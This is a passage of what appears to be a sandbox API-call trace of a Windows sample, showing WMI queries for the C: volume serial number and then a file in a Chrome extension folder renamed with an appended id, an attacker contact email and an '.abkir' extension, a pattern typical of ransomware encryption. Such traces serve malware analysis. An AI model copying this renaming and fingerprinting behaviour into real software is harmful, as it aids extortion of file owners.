[7]=0x25)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x0) returned 0x80004002 [0208.241] IUnknown:Release (This=0xb51e34) returned 0x1 [0208.241] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e180 | out: ppv=0x949e180*=0x6027300) returned 0x0 [0208.241] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027300, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e398 | out: ppvObject=0x949e398*=0x0) returned 0x80004002 [0208.241] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027300, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ac | out: ppvObject=0x949e3ac*=0x6030630) returned 0x0 [0208.241] WbemDefPath:IUnknown:Release (This=0x6027300) returned 0x0 [0208.241] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfcc | out: ppvObject=0x949dfcc*=0x6030630) returned 0x0 [0208.242] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949df88 | out: ppvObject=0x949df88*=0x0) returned 0x80004002 [0208.242] WbemDefPath:IUnknown:AddRef (This=0x6030630) returned 0x3 [0208.242] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d8e4 | out: ppvObject=0x949d8e4*=0x0) returned 0x80004002 [0208.242] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d894 | out: ppvObject=0x949d894*=0x0) returned 0x80004002 [0208.242] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d8a0 | out: ppvObject=0x949d8a0*=0xbe23f0) returned 0x0 [0208.242] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe23f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d8a8 | out: pCid=0x949d8a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0208.242] WbemDefPath:IUnknown:Release (This=0xbe23f0) returned 0x3 [0208.242] CoGetContextToken (in: pToken=0x949d900 | out: pToken=0x949d900) returned 0x0 [0208.242] CoGetContextToken (in: pToken=0x949dd08 | out: pToken=0x949dd08) returned 0x0 [0208.242] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dd98 | out: ppvObject=0x949dd98*=0x0) returned 0x80004002 [0208.242] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x2 [0208.242] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x1 [0208.242] CoGetContextToken (in: pToken=0x949e690 | out: pToken=0x949e690) returned 0x0 [0208.242] CoGetContextToken (in: pToken=0x949e5f0 | out: pToken=0x949e5f0) returned 0x0 [0208.242] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x949e6c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e6bc | out: ppvObject=0x949e6bc*=0x6030630) returned 0x0 [0208.242] WbemDefPath:IUnknown:AddRef (This=0x6030630) returned 0x3 [0208.242] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x2 [0208.242] WbemDefPath:IWbemPath:SetText (This=0x6030630, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0208.242] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x949e840 | out: puCount=0x949e840*=0x2) returned 0x0 [0208.242] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x949e83c*=0x0, pszText=0x0 | out: puBuffLength=0x949e83c*=0xf, pszText=0x0) returned 0x0 [0208.242] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x949e83c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e83c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.242] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e840 | out: ppv=0x949e840*=0xb51e34) returned 0x0 [0208.242] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e838 | out: pAptType=0x949e838*=1) returned 0x0 [0208.243] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e83c | out: ppvObject=0x949e83c*=0x0) returned 0x80004002 [0208.243] IUnknown:Release (This=0xb51e34) returned 0x1 [0208.243] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e460 | out: ppv=0x949e460*=0x6024f30) returned 0x0 [0208.243] WbemLocator:IUnknown:QueryInterface (in: This=0x6024f30, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e678 | out: ppvObject=0x949e678*=0x0) returned 0x80004002 [0208.243] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024f30, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e68c | out: ppvObject=0x949e68c*=0x6027310) returned 0x0 [0208.243] WbemLocator:IUnknown:Release (This=0x6024f30) returned 0x0 [0208.243] WbemLocator:IUnknown:QueryInterface (in: This=0x6027310, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2ac | out: ppvObject=0x949e2ac*=0x6027310) returned 0x0 [0208.243] WbemLocator:IUnknown:QueryInterface (in: This=0x6027310, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e268 | out: ppvObject=0x949e268*=0x0) returned 0x80004002 [0208.243] WbemLocator:IUnknown:AddRef (This=0x6027310) returned 0x3 [0208.243] WbemLocator:IUnknown:QueryInterface (in: This=0x6027310, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbc4 | out: ppvObject=0x949dbc4*=0x0) returned 0x80004002 [0208.244] WbemLocator:IUnknown:QueryInterface (in: This=0x6027310, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db74 | out: ppvObject=0x949db74*=0x0) returned 0x80004002 [0208.244] WbemLocator:IUnknown:QueryInterface (in: This=0x6027310, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db80 | out: ppvObject=0x949db80*=0x0) returned 0x80004002 [0208.244] CoGetContextToken (in: pToken=0x949dbe0 | out: pToken=0x949dbe0) returned 0x0 [0208.244] CoGetContextToken (in: pToken=0x949dfe8 | out: pToken=0x949dfe8) returned 0x0 [0208.244] WbemLocator:IUnknown:QueryInterface (in: This=0x6027310, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e078 | out: ppvObject=0x949e078*=0x0) returned 0x80004002 [0208.244] WbemLocator:IUnknown:Release (This=0x6027310) returned 0x2 [0208.244] WbemLocator:IUnknown:Release (This=0x6027310) returned 0x1 [0208.244] CoGetContextToken (in: pToken=0x949e658 | out: pToken=0x949e658) returned 0x0 [0208.244] CoGetContextToken (in: pToken=0x949e5b8 | out: pToken=0x949e5b8) returned 0x0 [0208.244] WbemLocator:IUnknown:QueryInterface (in: This=0x6027310, riid=0x949e688*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e684 | out: ppvObject=0x949e684*=0x6027310) returned 0x0 [0208.244] WbemLocator:IUnknown:AddRef (This=0x6027310) returned 0x3 [0208.244] WbemLocator:IUnknown:Release (This=0x6027310) returned 0x2 [0208.244] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x949e81c | out: puCount=0x949e81c*=0x2) returned 0x0 [0208.244] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=8, puBuffLength=0x949e818*=0x0, pszText=0x0 | out: puBuffLength=0x949e818*=0xf, pszText=0x0) returned 0x0 [0208.244] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=8, puBuffLength=0x949e818*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e818*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.244] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e6f4 | out: ppv=0x949e6f4*=0x6027350) returned 0x0 [0208.244] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027350, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e788 | out: ppNamespace=0x949e788*=0x6033164) returned 0x0 [0208.767] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e624 | out: ppvObject=0x949e624*=0xb5b044) returned 0x0 [0208.767] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b044, pProxy=0x6033164, pAuthnSvc=0x949e674, pAuthzSvc=0x949e670, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c, pImpLevel=0x949e65c, pAuthInfo=0x949e660, pCapabilites=0x949e664 | out: pAuthnSvc=0x949e674*=0xa, pAuthzSvc=0x949e670*=0x0, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c*=0x6, pImpLevel=0x949e65c*=0x2, pAuthInfo=0x949e660, pCapabilites=0x949e664*=0x1) returned 0x0 [0208.767] WbemLocator:IUnknown:Release (This=0xb5b044) returned 0x1 [0208.767] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e618 | out: ppvObject=0x949e618*=0xb5b064) returned 0x0 [0208.767] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e614 | out: ppvObject=0x949e614*=0xb5b044) returned 0x0 [0208.767] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b044, pProxy=0x6033164, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0208.768] WbemLocator:IUnknown:Release (This=0xb5b044) returned 0x2 [0208.768] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x1 [0208.768] CoTaskMemFree (pv=0xbd4918) [0208.768] WbemLocator:IUnknown:Release (This=0x6027350) returned 0x0 [0208.768] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e214 | out: ppvObject=0x949e214*=0xb5b064) returned 0x0 [0208.768] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e1d0 | out: ppvObject=0x949e1d0*=0x0) returned 0x80004002 [0208.787] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949dfec | out: ppvObject=0x949dfec*=0x0) returned 0x80004002 [0208.787] WbemLocator:IUnknown:AddRef (This=0xb5b064) returned 0x3 [0208.788] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949db2c | out: ppvObject=0x949db2c*=0x0) returned 0x80004002 [0208.788] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0208.788] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dae8 | out: ppvObject=0x949dae8*=0xb5afc4) returned 0x0 [0208.788] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5afc4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daf0 | out: pCid=0x949daf0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0208.789] WbemLocator:IUnknown:Release (This=0xb5afc4) returned 0x3 [0208.789] CoGetContextToken (in: pToken=0x949db48 | out: pToken=0x949db48) returned 0x0 [0208.789] CoGetContextToken (in: pToken=0x949df50 | out: pToken=0x949df50) returned 0x0 [0208.789] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfe0 | out: ppvObject=0x949dfe0*=0xb5b04c) returned 0x0 [0208.789] WbemLocator:IRpcOptions:Query (in: This=0xb5b04c, pPrx=0xb5b064, dwProperty=2, pdwValue=0x949e008 | out: pdwValue=0x949e008) returned 0x80004002 [0208.789] WbemLocator:IUnknown:Release (This=0xb5b04c) returned 0x3 [0208.789] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x2 [0208.789] CoGetContextToken (in: pToken=0x949e528 | out: pToken=0x949e528) returned 0x0 [0208.789] CoGetContextToken (in: pToken=0x949e488 | out: pToken=0x949e488) returned 0x0 [0208.789] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x949e558*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e554 | out: ppvObject=0x949e554*=0x6033164) returned 0x0 [0208.789] WbemLocator:IUnknown:AddRef (This=0x6033164) returned 0x4 [0208.789] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x3 [0208.789] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x2 [0208.789] SysStringLen (param_1=0x0) returned 0x0 [0208.789] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x949e8ec | out: puCount=0x949e8ec*=0x0) returned 0x0 [0208.789] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=2, puBuffLength=0x949e8e8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8e8*=0x20, pszText=0x0) returned 0x0 [0208.789] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=2, puBuffLength=0x949e8e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.789] CoGetContextToken (in: pToken=0x949e558 | out: pToken=0x949e558) returned 0x0 [0208.789] WbemLocator:IUnknown:AddRef (This=0xb5b064) returned 0x3 [0208.790] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0xb5b064) returned 0x0 [0208.790] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x3 [0208.790] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x2 [0208.790] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=2, puBuffLength=0x949e8f0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f0*=0x20, pszText=0x0) returned 0x0 [0208.790] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=2, puBuffLength=0x949e8f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.790] IWbemServices:GetObject (in: This=0x6033164, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e8a4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e8a4*=0x6028648, ppCallResult=0x0) returned 0x0 [0209.010] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x949e8a4 | out: puCount=0x949e8a4*=0x2) returned 0x0 [0209.010] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x949e8a0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8a0*=0xf, pszText=0x0) returned 0x0 [0209.010] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x949e8a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.010] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36d31a0*=0, plFlavor=0x36d31a4*=0 | out: pVal=0x949e8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36d31a0*=8, plFlavor=0x36d31a4*=0) returned 0x0 [0209.010] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.010] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.010] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36d31a0*=8, plFlavor=0x36d31a4*=0 | out: pVal=0x949e8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36d31a0*=8, plFlavor=0x36d31a4*=0) returned 0x0 [0209.010] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.010] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.010] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", lpFilePart=0x0) returned 0x97 [0209.010] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xba [0209.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e908) returned 1 [0209.011] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x949e984 | out: lpFileInformation=0x949e984*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x35cac2e0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0209.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e904) returned 1 [0209.011] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0209.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0209.012] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg", lpFilePart=0x0) returned 0x89 [0209.012] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\", lpFilePart=0x0) returned 0x8a [0209.012] 